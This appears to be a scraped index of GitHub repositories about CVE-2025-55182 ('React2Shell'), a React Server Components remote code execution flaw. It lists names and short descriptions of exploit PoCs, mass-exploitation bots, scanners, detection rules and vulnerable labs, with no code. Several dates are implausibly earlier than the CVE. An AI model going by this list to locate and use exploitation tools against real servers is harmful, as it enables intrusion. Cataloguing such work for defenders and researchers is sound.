React2Shell (CVE-2025-55182) proof-of-concept (PoC) exploit demonstrating a CRITICAL remote code execution (RCE) vulnera...
rsch-io 1 1 2025-12-09 View
CerberusMrX/Cerberus-React2Shell-Scanner-Exploit
Elite exploitation toolkit for CVE-2025-55182 (React Server Components RCE). Async polymorphic payloads, advanced WAF/CD...
CerberusMrX 1 1 2025-12-10 View
Machine-farmer/PunchingBag-for-React2Shell
Intentionally vulnerable Next.js app for CVE-2025-55182 security research and CTF challenges
Machine-farmer 1 1 2025-12-11 View
j0lt-github/react2shell-burp
Burp Suite extension for identifying the React Server Components unsafe deserialization vulnerability (React2Shell / CVE...
j0lt-github 1 1 2025-12-11 View
mantvmass/react2shell
A CLI tool that exploits vulnerabilities in React Server Components and Server Actions (CVE-2025-55182, CVE-2025-66478) ...
mantvmass 2 0 2025-12-13 View
ProwlSec/React2Shell
An advanced command-line framework for discovery, validation, and exploitation of CVE-2025-55182 and CVE-2025-66478 aff...
ProwlSec 1 1 2025-12-14 View
M4rgs/CVE-2025-55182-React2Shell-Exploit
A proof-of-concept tool for demonstrating the critical React2Shell vulnerability
M4rgs 1 1 2025-12-16 View
rahuulmiishra/react2shell-CVE-2025-55182
rahuulmiishra 1 1 2026-01-03 View
cahyod/react2shell
Alat ini mendeteksi potensi kerentanan React2Shell (CVE-2025-55182) dalam proyek React dengan memeriksa: - File `package...
cahyod 1 1 2025-12-08 View
LC-pro/CVE-2025-55182-EXP
LC-pro 2 0 2025-12-11 View
theman001/CVE-2025-55182
CVE-2025-55182 React RCE Test Program
theman001 2 0 2025-12-08 View
Asder10/React2Shell
🔍 Exploit CVE-2025-55182 vulnerabilities in Next.js and React with this efficient framework for rapid testing and assess...
Asder10 1 1 2026-01-08 View
wiixx44/CVE-2025-55182
🔍 Demonstrate CVE-2025-55182, a critical vulnerability in React Server Components allowing unauthenticated arbitrary cod...
wiixx44 1 1 2021-09-18 View
Emiyelbarto/CVE-2025-55182-PoC
Poc for CVE-2025-55182
Emiyelbarto 1 0 2025-12-04 View
Herick-Costa/CVE-2025-55182-React2Shell-RCE
React2Shell (CVE-2025-55182) PoC
Herick-Costa 1 0 2026-06-29 View
SentinelXofficial/CVE-2025-55182
PoC exploit for CVE-2025-55182 (React2Shell) — Pre-auth RCE in React Server Components | CVSS 10.0
SentinelXofficial 1 0 2026-06-16 View
Alejandro609x/JEFAZO-CVE-2025-55182-Checker
Escáner pasivo de seguridad para CVE-2025-55182 que identifica indicadores públicos asociados a Next.js y React Server C...
Alejandro609x 0 1 2026-06-11 View
harness-security-labs/CVE-2025-55182-checker
React/Next.js React4Shell RCE CVE-2025-55182 checker
harness-security-labs 1 0 2025-12-04 View
hakkuri01/r2rs
Interactive Ruby shell for authorized CVE-2025-55182 (react2shell) testing
hakkuri01 1 0 2026-05-31 View
K3ysTr0K3R/CVE-2025-55182-EXPLOIT
K3ysTr0K3R 1 0 2026-05-01 View
sonnycroco/HTB-Reactor-Linux-Machine---Walkthrough
Full walkthrough of HTB's Reactor machine — exploit CVE-2025-55182 to gain a shell, then get root via an exposed Node.js...
sonnycroco 1 0 2026-05-28 View
SpeatX/React2Shell-CVE-2025-55182
CVE-2025-55182 — Unauthenticated RCE in React Server Components (React2Shell). CVSS 10.0 exploit tool for authorized pen...
SpeatX 1 0 2026-05-24 View
renewablehacking/CVE-2025-55182-React-19.2.0
renewablehacking 1 0 2026-05-23 View
Y3B3L4Y3/CVE-2025-55182-test
Y3B3L4Y3 1 0 2025-12-05 View
RewantChaudhari/nextjs-rce-incident-response
Real-world incident response for CVE-2025-55182 (React2Shell) — script injection, server remediation, and post-incident ...
RewantChaudhari 0 1 2026-04-11 View
Airis101/CVE-2025-55182-analysis
浅谈React Server Components RCE 漏洞分析
Airis101 1 0 2025-12-05 View
GarethMSheldon/React2Shell-CVE-2025-55182-Detector
GarethMSheldon 1 0 2025-12-05 View
DelvyGonzalez/react2shell-security-toolkit
Security toolkit to detect CVE-2025-55182 (React2Shell) vulnerability
DelvyGonzalez 1 0 2025-12-07 View
UmmItKin/CVE-2025-55182-PoC
react2shell PoC with Go / CVE-2025-55182
UmmItKin 1 0 2025-12-07 View
arashiyans/CVE-2025-55182-CVE-2025-66478
scanner testing
arashiyans 1 0 2025-12-08 View
Benrich127N/react2shell_analyzer
a dart package to analyze CVE-2025-55182 react2shell
Benrich127N 1 0 2025-12-08 View
hamm0nz/react2shell-audit
A lightweight, recursive Bash script to detect Next.js and React Server DOM versions vulnerable to CVE-2025-55182 (React...
hamm0nz 1 0 2025-12-08 View
FurkanKAYAPINAR/ReactNext2Shell
CVE-2025-55182 and CVE-2025-66478
FurkanKAYAPINAR 1 0 2025-12-08 View
jan0x190/CVE-2025-55182-Simple-Scanner-main
jan0x190 1 0 2025-12-08 View
Shield-Cyber/react2shell-scanner
Scanner to detect the presence of CVE-2025-55182 & CVE-2025-66478 on targeted web services.
Shield-Cyber 1 0 2025-12-08 View
sun977/CVE-2025-55182
CVE-2025-55182 检测方式和攻击利用
sun977 1 0 2025-12-09 View
zxz3650/CVE-2025-55182-POC
CVE-2025-55182-POC
zxz3650 0 1 2025-12-07 View
h0tak88r/next88
High-performance Go implementation for detecting React Server Components RCE vulnerabilities (CVE-2025-55182 & CVE-2025-...
h0tak88r 0 1 2025-12-13 View
Ya0h4cker/CVE-2025-55182
Analysis, Validation Environment, and POC for CVE-225-55182 Vulnerability.
Ya0h4cker 0 1 2025-12-13 View
pwnxpl0it/react2shell-lab
React2shell vulnerable lab (CVE-2025-55182)
pwnxpl0it 0 1 2025-12-17 View
fevra-dev/GitExpose
Advanced security scanner detecting exposed files, React2Shell (CVE-2025-55182), ML model poisoning, LLM infrastructure ...
fevra-dev 1 0 2026-01-14 View
0xBlackash/CVE-2025-55182
CVE-2025-55182
0xBlackash 0 1 2026-02-23 View
MrMahile/MassScanning-CVE-2025-55182
A lightweight orchestrator and worker scanner setup for running large/continuous scans across split input files. This re...
MrMahile 0 1 2026-02-26 View
meneim99/react2shell-scanner
🔍 Detect vulnerabilities CVE-2025-55182 and CVE-2025-66478 in Next.js apps with this reliable command-line scanner.
meneim99 1 0 2023-11-27 View
l0lsec/cve-2025-55182-lab
Intentionally vulnerable Next.js RSC Docker lab for CVE-2025-55182 (React2Shell) local testing
l0lsec 0 1 2026-03-25 View
aspen-labs/CVE-2025-55182-checker
React/Next.js React4Shell RCE CVE-2025-55182 checker
aspen-labs 1 0 2025-12-04 View
Pa2sw0rd/exploit-CVE-2025-55182-poc
This POC demonstrates CVE-2025-55182 using actual `[email protected]` vulnerable code.
Pa2sw0rd 1 0 2025-12-04 View
mingyisecurity-lab/CVE-2025-55182-TOOLS
A Comprehensive CVE-2025-55182 Detection and Security Assessment Tool
mingyisecurity-lab 1 0 2025-12-04 View
ivaavimusic/React19-fix-vibecoders
CVE-2025-55182 Fix for Vibe Coders
ivaavimusic 1 0 2025-12-04 View
MedusaSH/POC-CVE-2025-55182
PoC CVE-2025-55182
MedusaSH 1 0 2025-12-04 View
clevernyyyy/CVE-2025-55182-Dockerized
clevernyyyy 1 0 2025-12-04 View
ABCFabian/React2Shell-CVE-2025-55182-Testing-Environment
A containerized testing environment for CVE-2025-55182, a critical (10.0 CVSS) Remote Code Execution vulnerability in Re...
ABCFabian 1 0 2025-12-05 View
imbas007/POC-CVE-2025-55182
imbas007 1 0 2025-12-05 View
rl0x01/CVE-2025-55182_PoC
Proof-of-Concept RCE pour CVE‑2025‑55182 exploitant le protocole React Flight sur Next.js App Router.
rl0x01 1 0 2025-12-05 View
subzer0x0/React2Shell
React2Shell (CVE-2025-55182) – An intentionally vulnerable Next.js application created for educational and research purp...
subzer0x0 1 0 2025-12-05 View
ceortiz33/CVE-2025-55182
Proof of Concept for React2Shell vulnerability
ceortiz33 1 0 2025-12-05 View
xkey8/react2shell
PoC for React2Shell (CVE-2025-55182)
xkey8 1 0 2025-12-05 View
rocklambros/React2Shell_Hunter
AWS Organization-wide detection toolkit for CVE-2025-55182 & CVE-2025-66478 (React Server Components / Next.js RCE vulne...
rocklambros 1 0 2025-12-06 View
sohaibeb/CVE-2025-55182
CVE-2025-55182 PoC Exploit
sohaibeb 1 0 2025-12-06 View
Qixinlee/CVE-2025-55182-Scanner
Automated scanner for CVE-2025-55182: a critical RCE vulnerability in React Server Components and Next.js.
Qixinlee 1 0 2025-12-07 View
Night-have-dreams/CVE-2025-55182-PoC
CVE-2025-55182 PoC
Night-have-dreams 1 0 2025-12-08 View
0xsj/CVE-2025-55182
0xsj 1 0 2025-12-08 View
0xSalm0n/CVE-2025-55182
0xSalm0n 1 0 2025-12-08 View
HUAHUAI23/CVE-2025-55182-POC
HUAHUAI23 1 0 2025-12-08 View
racall/cve-2025-55182-node
CVE-2025-55182 Next.js RCE Exploit Tool
racall 1 0 2025-12-08 View
ancs21/react2shell-scanner-rust
Detect CVE-2025-55182 & CVE-2025-66478 in Next.js/RSC applications (Rust)
ancs21 1 0 2025-12-09 View
keshavyaduvans/cve-2025-55182
keshavyaduvans 1 0 2025-12-09 View
Yyax13/CVE-2025-55182
RCE exploitation tool targeting CVE-2025-55182, a critical vulnerability in React Server Components (RSC) affecting Reac...
Yyax13 1 0 2025-12-09 View
ihsansencan/React2Shell-CVE-2025-55182
* React2Shell-CVE-2025-55182
ihsansencan 1 0 2025-12-09 View
theman001/CVE-2025-55182_PoC-Test-Server
CVE-2025-55182 React RCE Test Server
theman001 1 0 2025-12-10 View
JahazielLem/NSE_CVE-2025-55182
Nmap NSE script for scanning React2Shell (CVE-2025-55182)
JahazielLem 1 0 2025-12-10 View
Saad-Ayady/react2shellNSE
nmap script to scan react2shell (CVE-2025-55182 and CVE-2025-66478) Vulnerability
Saad-Ayady 1 0 2025-12-10 View
mrmtwoj/React2Shell-CVE-2025-55182
Educational / research tool related to React / Next.js vulnerability CVE‑2025‑55182 (“React2Shell”).
mrmtwoj 1 0 2025-12-11 View
mounta11n/CHECK-CVE-2025-55182-AND-CVE-2025-66478
Check if your server is affected by CVE-2025-55182 & CVE-2025-66478
mounta11n 1 0 2025-12-13 View
VVVI5HNU/CVE-2025-55182
Proof-of-Concept for CVE-2025-55182, a critical unauthenticated RCE in React Server Components.
VVVI5HNU 1 0 2025-12-14 View
mivmi/CVE-2025-55182
mivmi 1 0 2025-12-15 View
EQSTLab/CVE-2025-55182
React2Shell
EQSTLab 1 0 2025-12-16 View
lamaper/CVE-2025-55182-Toolbox
lamaper 1 0 2025-12-19 View
xxxTectationxxx/React2Shell-CVE-Lab
A self-hosted vulnerable Next.js environment running on Docker for simulating CVE-2025-55182. Built for educational secu...
xxxTectationxxx 1 0 2025-12-20 View
vonuyvicoo/nextploiter
NextJS exploiter for CVE-2025-55182 and more.
vonuyvicoo 1 0 2025-12-21 View
S3cr3t-SDN/React4Shell
Exploit Code for React2Shell RCE vulnerability (CVE-2025-55182) affecting React Server Components 19.0.0-19.2.0. Exploit...
S3cr3t-SDN 1 0 2025-12-22 View
itsismarcos/Bot-exploit-CVE-2025-55182
Mass Bot Exploit
itsismarcos 1 0 2025-12-26 View
kanyokoo/React-Server-Components-Remote-Code-Execution-CVE-2025-55182-
script to help solve the lab on hackviser covering (CVE-2025-55182)
kanyokoo 1 0 2025-12-26 View
captain4554/CVE-2025-55182-Scanner
🛡️ Scan and assess vulnerabilities in Next.js/Waku with the CVE-2025-55182-Scanner, combining static and dynamic analysi...
captain4554 1 0 2026-01-02 View
xiaoLvChen/CVE-2025-55182
CVE-2025-55182(React Server Components 反序列化远程代码执行漏洞)
xiaoLvChen 1 0 2026-01-01 View
captain4554/captain4554.github.io
🔍 Scan for CVE-2025-55182 vulnerabilities with a hybrid tool that combines static and dynamic analysis for improved secu...
captain4554 1 0 2026-01-02 View
m3ngx1ng/CVE-2025-55182-GUI
CVE-2025-55182 漏洞检测与利用工具(GUI版)
m3ngx1ng 1 0 2026-01-03 View
woorifisa-service-dev-6th/tech-seminar-React2Shell
[우리 FISA] 기술 세미나 우승 - 클라우드 서비스 개발 6기 3팀 - React2Shell (CVE-2025-55182) 분석 및 연구
woorifisa-service-dev-6th 1 0 2026-02-02 View
George0Papasotiriou/CVE-2025-55182-React2Shell-CVSS-10.0-
George0Papasotiriou 1 0 2026-02-10 View
Wyl-cmd/CVE-2025-55182
针对 Next.js 原型污染漏洞 (CVE-2025-55182) 的高效批量检测工具。
Wyl-cmd 1 0 2026-02-13 View
orgito1015/CVE-2025-55182-Researching-process
orgito1015 1 0 2026-02-18 View
luoluoqingge/CVE-2025-55182
luoluoqingge 1 0 2026-03-18 View
aliksir/nextjs-security-scanner
Bash script to detect CVE-2025-55182 (React2Shell) and credential exposure in Next.js projects. Zero dependencies.
aliksir 1 0 2026-04-03 View
alyaapm/CVE-2025-55182-shellinteractive
alyaapm 0 1 2024-11-29 View
Mayca369/CVE-2025-55182
🚨 Exploit CVE-2025-55182 to demonstrate RCE in React Server Functions, highlighting risks from insecure prototype refere...
Mayca369 0 1 2025-06-06 View
joshterrill/CVE-2025-55182-realistic-poc
a realistic POC demonstrating the missing `hasOwnProperty` check in [email protected]
joshterrill 0 1 2025-12-04 View
gagaltotal/tot-react-rce-CVE-2025-55182
CVE-2025-55182 – CVE-2025-66478 – React2Shell
gagaltotal 1 0 2025-12-12 View
BrianLopezM99/react2shell-CVE-2025-55182
An exploitation tool for the Next.js vulnerability CVE-2025-55182 that allows remote command execution through a poisoni...
BrianLopezM99 1 0 2026-02-09 View
Gymnott1/CVE-2025-55182
Gymnott1 1 0 2025-12-10 View
emadshanab/POC-for-CVE-2025-55182
POC for CVE-2025-55182
emadshanab 1 0 2025-12-05 View
iksanwkk/CVE-2025-55182-exp
🚨 Exploit CVE-2025-55182, a critical RCE vulnerability in React Server Components for Next.js apps; enables testing for ...
iksanwkk 1 0 2024-04-24 View
phornnato/CVE-2025-55182
🚨 Exploit and scan for CVE-2025-55182, a critical React/Next.js vulnerability enabling remote code execution through pro...
phornnato 1 0 2024-05-28 View
andrei2308/react2shell
CVE-2025-55182
andrei2308 1 0 2025-12-11 View
mahaveer-choudhary/CVE-2025-55182
A Python-based security scanner for detecting and exploiting **React Server Components (RSC)** vulnerabilities in Next.j...
mahaveer-choudhary 0 1 2025-12-19 View
ahmed-dev-op/CVE-2025-55182
⚠️ Explore a vulnerable environment to test security scanners against the CVE-2025-55182 RCE flaw in React Server Compon...
ahmed-dev-op 1 0 2025-07-15 View
amnsecurity/reactorwatch-pentest
☢️ ReactorWatch v3.2.1 — Nuclear Reactor Core Monitoring System Pentest | CVE-2025-55182 (React2Shell) Unauthenticated R...
amnsecurity 0 0 2026-07-10 View
xp101t/react2shell
PoC for CVE-2025-55182 React2Shell
xp101t 0 0 2026-07-09 View
RootEvil333/CVE-2025-55182
Exploit for CVE-2025-55182
RootEvil333 0 0 2026-07-08 View
diamorphine666/React2shell-CVE-2025-55182-Exploit
Next.js / RSC - Unauthenticated RCE (React2Shell) (CVE-2025-55182)
diamorphine666 0 0 2026-07-06 View
k1llmelira/react2shell-exploit
React2Shell: CVE-2025-55182 exploit from tryhackme‼️
k1llmelira 0 0 2026-06-28 View
litndat/React2Shell-PoC-CVE-2025-55182
Khai thác lỗ hổng bảo mật CVE-2025-55182
litndat 0 0 2026-06-24 View
avoidme12/CVE-2025-55182-POC
React2Shell POC
avoidme12 0 0 2026-06-22 View
Fomovet/cve-2025-55182
POC for CVE-2025-55182
Fomovet 0 0 2026-06-21 View
cc3305/CVE-2025-55182
CVE-2025-55182 exploit script
cc3305 0 0 2026-06-13 View
AkhmadKholmurodov/React2Shell_Exploit
I created simple react2shell CVE-2025-55182 python exploit
AkhmadKholmurodov 0 0 2026-06-09 View
huangzccn/CVE-2025-55182
CVE-2025-55182
huangzccn 0 0 2025-12-05 View
TechWithOrgito/CVE-2025-55182-Researching-process
TechWithOrgito 0 0 2026-06-06 View
rvzsec/react2shell
react2shell - CVE-2025-55182 (Next.js: CVE-2025-66478) - Unauthenticated RCE in React Server Components (Flight Protocol...
rvzsec 0 0 2026-06-05 View
yurahshell/CVE-2025-55182
yurahshell 0 0 2026-06-05 View
tanvirahmedcs/CVE-2025-55182
react CVE-2025-55182
tanvirahmedcs 0 0 2026-06-05 View
tamagorengs/react2shell-poc-CVE-2025-55182
tamagorengs 0 0 2025-12-20 View
LuizHenz/PoC-CVE-2025-55182
LuizHenz 0 0 2026-05-29 View
alphad4n/COMPLETE-CVE-2025-55182
alphad4n 0 0 2025-12-12 View
Jeanback1/react-rsc-cve-2025-55182-lab
Educational lab demonstrating CVE-2025-55182: Critical RCE in React Server Components via prototype pollution in the Fli...
Jeanback1 0 0 2026-05-26 View
lvx9101-ux/CVE-2025-55182
lvx9101-ux 0 0 2026-05-25 View
w3nch/CVE-2025-55182-in-go
w3nch 0 0 2026-05-24 View
Industri4l-H3ll-Xpl0it3rs/CVE-2025-55182-React2Shell
CVE-2025-55182 Exploit | by infrar3d
Industri4l-H3ll-Xpl0it3rs 0 0 2026-05-19 View
ycseo-git/CVE-2025-55182
a.k.a. React2Shell
ycseo-git 0 0 2026-05-18 View
MuharremK0/Info-Sys-Security-CVE-2025-55182
MuharremK0 0 0 2026-05-17 View
open-flaw/CVE-2025-55182
open-flaw 0 0 2025-12-19 View
unixskid/CVE-2025-55182-React2Shell
unixskid 0 0 2026-02-25 View
bakhod1r/CVE-2025-55182
bakhod1r 0 0 2025-12-10 View
muthaiyanmani/react2shell-checker
A security vulnerability scanner for detecting the React2Shell vulnerability (CVE-2025-55182) in Next.js and React appli...
muthaiyanmani 0 0 2025-12-08 View
Theori-lO/reactguard
ReactGuard provides framework- and vulnerability-detection tooling for CVE-2025-55182 (React2Shell)
Theori-lO 0 0 2026-04-29 View
Cybersecurity-Enthusiasts-CE/CVE-2025-55182-Researching-process
Cybersecurity-Enthusiasts-CE 0 0 2026-04-25 View
joaoreis13/flight-risk
Security toolkit for CVE-2025-55182 (React2Shell) — scan, detect, correlate, and test React Server Components RCE vulner...
joaoreis13 0 0 2026-04-22 View
devianntsec/CVE-2025-55182
Advanced security research on CVE-2025-55182 (React2Shell). Features an exploitation framework with 6 functional impact ...
devianntsec 0 0 2026-03-25 View
Mohamedniane/cve-2025-55182-analysis
Security research & exploitation analysis of CVE-2025-55182 (React) — CVSS + OWASP Top 10 mapping
Mohamedniane 0 0 2026-04-18 View
opsecramdan/react2shell-cve-2025-55182
opsecramdan 0 0 2026-04-15 View
masterwok/PoC-CVE-2025-55182
CVE-2025-55182 (React2Shell) PoC: Unauthenticated RCE affecting React 19.x and Next.js < 15.1.4. Exploits vulnerabilitie...
masterwok 0 0 2026-04-10 View
DeDnY/CVE-2025-55182-poc-panel
This is a special panel that is used to send POC requests with the output of responses.
DeDnY 0 0 2026-04-13 View
AbdullahMaqbool22/Explosive-As-Hell-MCS-Qualifer-Web-500
[First-Blood-XO] React Server Component endpoint vulnerable to CVE-2025-55182 (RCE) → enumerated SUID binaries → /usr/bi...
AbdullahMaqbool22 0 0 2026-04-13 View
oscar-mine/R2SAE
Firefox extension for detecting and exploiting CVE-2025-55182 — Prototype Pollution RCE in Next.js React Server Actions
oscar-mine 0 0 2026-04-12 View
kaxm23/rust-cve-2025-55182-scanner
powerfull rust cve-2025-55182-scanner used for ctf & ethical purpose only
kaxm23 0 0 2026-04-10 View
kaxm23/CVE-2025-55182-Auto-Scanner
CVE-2025-55182 Auto Scanner - Improved Version For authorized CTF/testing purposes only
kaxm23 0 0 2026-04-10 View
masterwok/CVE-2025-55182-React2Shell-PoC
Proof-of-concept exploit for CVE-2025-55182 (React2Shell)
masterwok 0 0 2026-04-10 View
unixskid/CVE-2025-55182-Interactive-mode
unixskid 0 0 2026-02-25 View
Dread1ess/CVE-2025-55182
A critical-severity vulnerability in React Server Components (CVE-2025-55182) affects React 19 and frameworks that use i...
Dread1ess 0 0 2025-12-06 View
mayank729/CVE-2025-55182-scanner
🔍 Scan for CVE-2025-55182 risks in React Server Components with this non-intrusive tool that helps detect critical vulne...
mayank729 0 0 2022-06-17 View
RajChowdhury240/React2Shell-CVE-2025-55182
React2Shell | CVE-2025-55182 - React Server Components RCE
RajChowdhury240 0 0 2025-12-05 View
mohit121312/CVE-2025-55182_full_exploit
this repo have CVE-2025-55182 full exploit with RCE
mohit121312 0 0 2025-12-05 View
I3r1h0n/React2Shell
My research on CVE-2025-55182
I3r1h0n 0 0 2025-12-06 View
zorejt/Rust_CVE-2025-55182
zorejt 0 0 2025-12-06 View
yunaranyancat/CVE-2025-55182-NSE
Meow
yunaranyancat 0 0 2025-12-06 View
MrSol0/CVE-2025-55182-Terminal
This is a POC for testing your projects that are vulnerable to CVE-2025-55182 with a terminal and ability to scan a list
MrSol0 0 0 2025-12-06 View
Bashamega/react-CVE-2025-55182-fixer
Patches CVE-2025-55182 in your repositories
Bashamega 0 0 2025-12-06 View
orgito1015/CVE-2025-55182-RCE-Exploit
More exploit-focused; great for security research repos.
orgito1015 0 0 2025-12-06 View
aastikgakhar/CVE-2025-55182-react2shell
Detects exposed React Server Components vulnerable to CVE-2025-55182 via RSC negotiation.
aastikgakhar 0 0 2025-12-06 View
0xN7y/CVE-2025-55182
Poc for CVE-2025-55182
0xN7y 0 0 2025-12-06 View
shreyas-malhotra/React2Shell-CVE-2025-55182
A minimal RCE PoC for CVE-2025-55182
shreyas-malhotra 0 0 2025-12-06 View
MikeTheHash/CVE-2025-55182
A modified and a little boosted exploit for CVE-2025-55182, React2Shell: Pre-authentication Remote Code Execution in Rea...
MikeTheHash 0 0 2025-12-06 View
jumodada/react-cve-2025-55182-demo
jumodada 0 0 2025-12-07 View
shakilkhatri/scanner-for-CVE-2025-55182-vulnerability
CVE-2025-55182 Detector. Find which of your GitHub repositories are exposed to the critical React/Next.js RCE vulnerabil...
shakilkhatri 0 0 2025-12-07 View
hunter24x24/CVE-2025-55182-mass
hunter24x24 0 0 2025-12-07 View
andressuarezmonk/CVE-2025-55182
andressuarezmonk 0 0 2025-12-07 View
umairahmadh/react-vuln-scanner
A bash script to scan your server for React applications vulnerable to **CVE-2025-55182** — a critical remote code execu...
umairahmadh 0 0 2025-12-07 View
satriarizka/CVE-2025-55182-Simple-Scanner
High-fidelity RCE scanner for CVE-2025-55182 affecting Next.js RSC. Supports mass scanning, command execution, and autom...
satriarizka 0 0 2025-12-07 View
DoobTheGoober/CVE-2025-55182-Test-Server
Play with react2shell in a safe environment!
DoobTheGoober 0 0 2025-12-07 View
lalaterry/CVE-2025-55182-React2Shell-lab
lalaterry 0 0 2025-12-08 View
lincemorado97/CVE-2025-55182_CVE-2025-66478
CVE-2025-55182 + CVE-2025-66478 - Next.js/React Server Components Remote Code Execution
lincemorado97 0 0 2025-12-08 View
wangzhengquan/CVE-2025-55182
https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
wangzhengquan 0 0 2025-12-08 View
TH-SecForge/CVE-2025-55182
TH-SecForge 0 0 2025-12-08 View
chitoz1300/React2Shell-CVE-2025-55182
* React2Shell-CVE-2025-55182
chitoz1300 0 0 2025-12-08 View
thekamran/CVE-2025-55182-Proof-of-Concept
thekamran 0 0 2025-12-08 View
randarts/react-rce
CVE-2025-55182 취약점에 대한 샘플을 AI와 함께 작성 및 테스트 했습니다.
randarts 0 0 2025-12-08 View
Macaroniwdcheese/CVE-2025-55182-Lab
Macaroniwdcheese 0 0 2025-12-08 View
LvMalware/CVE-2025-55182
Exploit for CVE-2025-55182 (React4Shell)
LvMalware 0 0 2025-12-08 View
MaxK9999/CVE-2025-55182
MaxK9999 0 0 2025-12-06 View
7amzahard/React2shell
CVE-2025-55182
7amzahard 0 0 2025-12-08 View
yaupunal/CVE-2025-55182-scanner
CVE-2025-55182-scanner with 2 different method
yaupunal 0 0 2025-12-08 View
jandelima/cve-2025-55182-poc-test
jandelima 0 0 2025-12-08 View
slreaperking/CVE-2025-55182-poc
🚨 Demonstrate CVE-2025-55182, a critical React vulnerability allowing remote code execution via prototype chain pollutio...
slreaperking 0 0 2025-12-24 View
lowercasenumbers/CVE-2025-55182
CVE-2025-55182 React2Shell PoC
lowercasenumbers 0 0 2025-12-08 View
LQTjim/next-bug-CVE-2025-55182
LQTjim 0 0 2025-12-08 View
AliAbdollahiii/react2shell_detector
Heuristic security scanner for detecting React Server Components (RSC) vulnerabilities, including React2Shell-style beha...
AliAbdollahiii 0 0 2025-12-08 View
MoisesTapia/http-react2shell
Detection of the React Server Actions Exploit vector – CVE-2025-55182 / CVE-2025-66478
MoisesTapia 0 0 2025-12-09 View
solidevil14/Suricata-Rule-for-Detecting-CVE-2025-55182
CVE‑2025‑55182 Detection
solidevil14 0 0 2025-12-09 View
iamblacksolo2-BugBounty/POC-CVE-2025-55182
iamblacksolo2-BugBounty 0 0 2025-12-09 View
DevVaibhav07/POC-CVE-2025-55182
POC-CVE-2025-55182
DevVaibhav07 0 0 2025-12-09 View
liamromanis101/cve-2025-55182
Python3 script that can be used to demonstrate **CVE-2025-55182**. It exploits a server-side JavaScript injection vulner...
liamromanis101 0 0 2025-12-09 View
ysfcndgr/React2Shell-CVE-2025-55182-Advanced-Scanner
ysfcndgr 0 0 2025-12-09 View
eytannatye/R2S_CVE-2025-55182
eytannatye 0 0 2025-12-09 View
Jaycelation/CVE-2025-55182
PoC, Hunting React2Shell about CVE-2025-55182
Jaycelation 0 0 2025-12-09 View
Stonelinks/react-cve-2025-55182
malware I found on my server
Stonelinks 0 0 2025-12-09 View
trax69/cve-2025-55182-poc
Proof of Concept for CVE-2025-55182 ("React2Shell"). A fully dockerized environment demonstrating Remote Code Execution ...
trax69 0 0 2025-12-09 View
osman-butt/CVE-2025-55182-demo
Demo of CVE-2025-55182 — Next.js RCE (for educational purposes)
osman-butt 0 0 2025-12-09 View
iamblacksolo2-BugBounty/POC2-CVE-2025-55182
iamblacksolo2-BugBounty 0 0 2025-12-10 View
gunyakit/CVE-2025-55182-PoC-exploit
Next.js RCE via React Server Functions
gunyakit 0 0 2025-12-10 View
CrazyloveforWeb/Golang-CVE-2025-55182-POC
CrazyloveforWeb 0 0 2025-12-10 View
rahul-securify/React2Shell-CVE-2025-55182
rahul-securify 0 0 2025-12-12 View
ryanhafid/PoC_CVE-2025-55182
ryanhafid 0 0 2025-12-12 View
ryanhafid/Scan_CVE-2025-55182
ryanhafid 0 0 2025-12-12 View
Kugelbyte/React2Shell-Analysis
A research report on CVE-2025-55182 (React2Shell).
Kugelbyte 0 0 2025-12-13 View
dhananjayakumarn/CVE-2025-55182-Lab
A hands-on lab for understanding and exploiting CVE-2025-55182 (React2Shell) - Remote Code Execution in React Server Com...
dhananjayakumarn 0 0 2025-12-13 View
ZorvithonLeo-Null/CVE-2025-55182-exploit
ZorvithonLeo-Null 0 0 2025-12-13 View
tinashelorenzi/CVE-2025-55182
tinashelorenzi 0 0 2025-12-14 View
CyberPrince-hub/React2shell-ultimate-scanner
CVE-2025-55182-Advanced-Scanner is an automated security tool designed to detect and validate the CVE-2025-55182 vulnera...
CyberPrince-hub 0 0 2025-12-14 View
Call123X/-cve-2025-55182
cve-2025-55182
Call123X 0 0 2025-12-15 View
simantchaudhari/CVE-2025-55182
simantchaudhari 0 0 2025-12-15 View
nulltrace1336/CVE-2025-55182-Metasploit-exploit-skeleton-real-flow-
Quyida to‘liq LAB rejasi: demo-vulnerable app → Python PoC → Metasploit exploit skeleton
nulltrace1336 0 0 2025-12-16 View
r4j3sh-com/CVE-2025-55182
Lightweight Go toolkit plus a Dockerized Next.js lab to explore and triage CVE-2025-55182.
r4j3sh-com 0 0 2025-12-18 View
niokagi/react-cve-2025-55182
Test & Analyze the CVE-2025-55182 vulnerability within Next.js Server Actions
niokagi 0 0 2025-12-21 View
knightwolf01/React2Shell
React2Shell Critical Vulnerability (CVE-2025-55182)
knightwolf01 0 0 2025-12-22 View
ckex/test-vuln
a controlled environment to test CVE-2025-55182.
ckex 0 0 2025-12-23 View
Farhan9488/CVE-2025-55182-research
🛡️ Explore CVE-2025-55182, a critical RCE vulnerability in React's Flight Protocol, demonstrating exploitation technique...
Farhan9488 0 0 2025-12-24 View
Jakelife/HACKVISER-CVE-2025-55182-LAB
Jakelife 0 0 2025-12-25 View
thqxploit666/CVE-2025-55182
thqxploit666 0 0 2025-12-26 View
0xROI/CVE-2025-55182
Exploitation script for CVE-2025-55182. This is modified only for my personal use. If you are facing any problem fix it ...
0xROI 0 0 2025-12-26 View
KingHacker353/R2C-CVE-2025-55182-66478
KingHacker353 0 0 2025-12-27 View
amirali-ramezani/react2shell-CVE-2025-55182-
amirali-ramezani 0 0 2025-12-29 View
git0xLai/React2ShellPoC
This repository provides a proof-of-concept for CVE-2025-55182 (React2Shell), a remote code execution vulnerability in R...
git0xLai 0 0 2025-12-30 View
hndko/react2shell-rce-autobot
🎯 Automated vulnerability scanner for React2Shell RCE - Google dorking + safe detection for CVE-2025-55182/CVE-2025-6647...
hndko 0 0 2025-12-30 View
ghostn4444/CVE-2025-55182
CVE-2025-55182 - Tool React2Shell
ghostn4444 0 0 2026-01-02 View
HackIndex-io/React2Shell-CVE-2025-55182
A HackIndex.io sandbox environment for the React2Shell vulnerability.
HackIndex-io 0 0 2026-01-02 View
joaovicdev/EXPLOIT-CVE-2025-55182
joaovicdev 0 0 2026-01-04 View
gahoole77/gahoole77.github.io
🔍 Discover and scan vulnerable Next.js instances to protect your infrastructure from critical RCE vulnerabilities like C...
gahoole77 0 0 2026-01-04 View
hyan0116/Next.js-RCE-CVE-2025-55182
next.js rce exploit
hyan0116 0 0 2026-01-05 View
MyCompanyOrganization/React2Shell-Kingdom
"Once upon a time, the Castle of Reactland trusted all Flight messages... until The Imposter arrived." A storytelling CV...
MyCompanyOrganization 0 0 2026-01-06 View
yannisduvignau/react2shell-exploit
